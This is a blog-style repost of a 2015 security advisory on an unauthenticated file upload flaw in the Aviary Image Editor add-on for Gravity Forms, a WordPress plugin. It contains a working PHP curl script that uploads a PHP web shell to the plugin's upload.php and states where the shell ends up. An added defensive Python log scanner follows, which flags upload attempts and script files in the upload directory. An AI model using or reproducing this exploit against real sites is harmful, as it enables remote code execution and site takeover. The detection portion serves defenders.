This time I want to share the WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta shell upload vulnerability exploit. Let's get straight to it :D
= Author: Larry W. Cashdollar, @_larry0
= Date: 2015-06-07
= Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
= Vendor: Waters Edge Web Design and NetherWorks LLC
= Vendor Notified: 2015-06-08
= Advisory: http://www.vapid.dhs.org/advisory.php?v=125
= Vulnerability in 'upload.php': BLANK Page
=======================================================================
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php: an unauthenticated user can upload any file to the system, including a .php file. upload.php doesn't check that the user is authenticated, and a simple POST will allow arbitrary code to be uploaded to the server.
Exploit Code:
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/nameshell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'nameshell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
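For defenders, one way to check web server access logs for use of this upload path, as an added example that is not part of the original post or the advisory: it flags POST requests to the plugin's includes/upload.php and requests for script-type files under uploads/gform_aviary/. The Combined Log Format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the advisory text above.
UPLOAD_ENDPOINT = "/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php"
UPLOAD_DIR = "/wp-content/uploads/gform_aviary/"
# Assumed list of extensions a PHP-enabled server may execute; adjust to your handler config.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Assumed Combined Log Format: ip - user [time] "METHOD uri proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.7 - - [08/Jun/2015:10:01:02 +0000] "POST /wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php HTTP/1.1" 200 0 "-" "curl/7.38"',
    '203.0.113.7 - - [08/Jun/2015:10:01:05 +0000] "GET /wp-content/uploads/gform_aviary/_shell.php HTTP/1.1" 200 512 "-" "curl/7.38"',
    '198.51.100.4 - - [08/Jun/2015:10:02:00 +0000] "GET /wp-content/uploads/gform_aviary/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [08/Jun/2015:10:03:00 +0000] "GET /wp-content/uploads/gform_aviary/a.php.jpg?x=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return findings as (kind, ip, time, path, status) tuples."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, uri, status = m.groups()
        path = unquote(uri.split("?", 1)[0])  # drop query string, decode %xx
        name = path.rsplit("/", 1)[-1]
        if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
            # The endpoint is unauthenticated, so every POST needs review.
            findings.append(("upload_post", ip, ts, path, int(status)))
        elif UPLOAD_DIR in path and SCRIPT_EXT.search(name):
            # A script-type file in the image upload directory is never expected.
            findings.append(("script_in_upload_dir", ip, ts, path, int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `script_in_upload_dir` hit with status 200 means the file exists on disk and should be treated as an incident; a 404 still shows someone probing for it.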
That's all, and thank you,
Wassalamualaikum wr. wb.